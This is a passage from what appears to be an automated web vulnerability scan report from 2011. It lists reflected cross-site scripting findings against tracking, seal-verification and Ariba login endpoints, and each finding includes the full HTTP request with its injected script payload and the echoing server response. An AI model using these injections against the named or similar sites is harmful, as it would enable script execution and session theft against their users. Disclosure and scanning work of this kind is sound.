meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:33 GMT
Etag: "37ffb94b59a8bc6875f2fe03bbba3a2016944b60"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Content-Length: 466
Connection: keep-alive

if (typeof(meteor) === 'undefined' || meteor === null) { if (typeof(console) !== 'undefined' && console !== null) { console.log('ERROR: metsol needs to be included to track'); }} else { meteor.tracking.cdnt_data={"parent_id": "", "id": "oeXUNV1U7uA", "source": "cookie"}; meteor.tracking.track('210b48e7-54b9-49da-8cc7-374d915b8017',{"query_string_tag_key": ["CR_CCd05c9<script>alert(1)</script>95ea4625fe1", "cr_cc", "mtag"], "url_storage_source": "hash"});}

1.8. http://cdnt.meteorsolutions.com/api/multi_track [url_storage_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/multi_track

Issue detail

The value of the url_storage_source request parameter is copied into the HTML document as plain text between tags. The payload fec30<script>alert(1)</script>f8aba0eed30 was submitted in the url_storage_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/multi_track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_storage_source=hashfec30<script>alert(1)</script>f8aba0eed30&query_string_tag_key=CR_CC&query_string_tag_key=cr_cc&query_string_tag_key=mtag HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:30 GMT
Etag: "e7ee094d45b558837c747ca5bd93c1a970744515"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Content-Length: 466
Connection: keep-alive

if (typeof(meteor) === 'undefined' || meteor === null) { if (typeof(console) !== 'undefined' && console !== null) { console.log('ERROR: metsol needs to be included to track'); }} else { meteor.t
...[SNIP]...
"parent_id": "", "id": "oeXUNV1U7uA", "source": "cookie"}; meteor.tracking.track('210b48e7-54b9-49da-8cc7-374d915b8017',{"query_string_tag_key": ["CR_CC", "cr_cc", "mtag"], "url_storage_source": "hashfec30<script>alert(1)</script>f8aba0eed30"});}

1.9. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload eea01<script>alert(1)</script>e7a5c7a871a was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_fbid=oeXUNV1U7uA&parent_fbid=&referrer=http%3A%2F%2Fm.microsoft.com%2Fen-us%2Fdefault.mspx&location=http%3A%2F%2Fm.microsoft.com%2FOffice365%2Foofofficephoto%2Fen-US%2Fgallery.mspx&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Beea01<script>alert(1)</script>e7a5c7a871a HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:43 GMT
Etag: "33a5ca3755db0488bdb5d003b2d594532f8b0b0b"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_210b48e7-54b9-49da-8cc7-374d915b8017=210b48e7-54b9-49da-8cc7-374d915b8017%3C%3EoeXUNV1U7uA%3C%3E%3C%3Ehttp%253A%2F%2Fm.microsoft.com%2Fen-us%2Fdefault.mspx%3C%3Ehttp%253A%2F%2Fm.microsoft.com%2FOffice365%2Foofofficephoto%2Fen-US%2Fgallery.mspx; Domain=.meteorsolutions.com; expires=Wed, 17 Oct 2012 13:58:43 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6; Domain=.meteorsolutions.com; expires=Wed, 17 Oct 2012 13:58:43 GMT; Path=/
Content-Length: 174
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "oeXUNV1U7uA", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6"}, 0);eea01<script>alert(1)</script>e7a5c7a871a

1.10. https://cert.webtrust.org/SealFile [seal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /SealFile

Issue detail

The value of the seal request parameter is copied into the HTML document as plain text between tags. The payload 9c065<script>alert(1)</script>396aff9ffe5 was submitted in the seal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SealFile?seal=7819c065<script>alert(1)</script>396aff9ffe5&file=logo1 HTTP/1.1
Host: cert.webtrust.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://cert.webtrust.org/ViewSeal?id=781
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 18 Oct 2011 16:36:05 GMT
Content-Type: text/html
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Length: 3698

<html><head><title>Apache Tomcat/4.0.6 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;c
...[SNIP]...
<pre>java.lang.NumberFormatException: For input string: "7819c065<script>alert(1)</script>396aff9ffe5"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.11. https://cert.webtrust.org/ViewSeal [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7a702<script>alert(1)</script>32ebbf9783f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=7817a702<script>alert(1)</script>32ebbf9783f HTTP/1.1
Host: cert.webtrust.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://service.ariba.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 16:36:02 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 2976

java.lang.NumberFormatException: For input string: "7817a702<script>alert(1)</script>32ebbf9783f"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.12. https://connect.ariba.com/AC [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 441fb--><script>alert(1)</script>b6406cede49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC?441fb--><script>alert(1)</script>b6406cede49=1 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/services/support.cfm?x=9
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:09:12 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:09:12 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC?441fb--><script>alert(1)</script>b6406cede49=1-->
...[SNIP]...

1.13. https://connect.ariba.com/AC_Login/ [IsErr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the IsErr request parameter is copied into an HTML comment. The payload ba897--><script>alert(1)</script>bd0dd96e3d3 was submitted in the IsErr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=Trueba897--><script>alert(1)</script>bd0dd96e3d3&u=a&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:32 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:31 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=Trueba897--><script>alert(1)</script>bd0dd96e3d3&u=a&sc=AC_Home_Page/-->
...[SNIP]...

1.14. https://connect.ariba.com/AC_Login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf284--><script>alert(1)</script>69a1aebb79c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/&bf284--><script>alert(1)</script>69a1aebb79c=1 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:35 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:35 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/&bf284--><script>alert(1)</script>69a1aebb79c=1-->
...[SNIP]...

1.15. https://connect.ariba.com/AC_Login/ [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e69"><script>alert(1)</script>d233b41abc1 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/44e69"><script>alert(1)</script>d233b41abc1 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:34 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:34 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<FORM METHOD=POST NAME="frmLogIn" ACTION="/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/44e69"><script>alert(1)</script>d233b41abc1">
...[SNIP]...

1.16. https://connect.ariba.com/AC_Login/ [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the sc request parameter is copied into an HTML comment. The payload 42531--><script>alert(1)</script>9d122f18f73 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/42531--><script>alert(1)</script>9d122f18f73 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:35 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:34 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/42531--><script>alert(1)</script>9d122f18f73-->
...[SNIP]...

1.17. https://connect.ariba.com/AC_Login/ [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the u request parameter is copied into an HTML comment. The payload 97e5a--><script>alert(1)</script>5ae655a4126 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=True&u=a97e5a--><script>alert(1)</script>5ae655a4126&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:33 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:32 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=True&u=a97e5a--><script>alert(1)</script>5ae655a4126&sc=AC_Home_Page/-->
...[SNIP]...

1.18. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the BaseURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fd54"%3balert(1)//dfb25cd5db685531b was submitted in the BaseURL parameter. This input was echoed as 1fd54";alert(1)//dfb25cd5db685531b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com1fd54"%3balert(1)//dfb25cd5db685531b&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
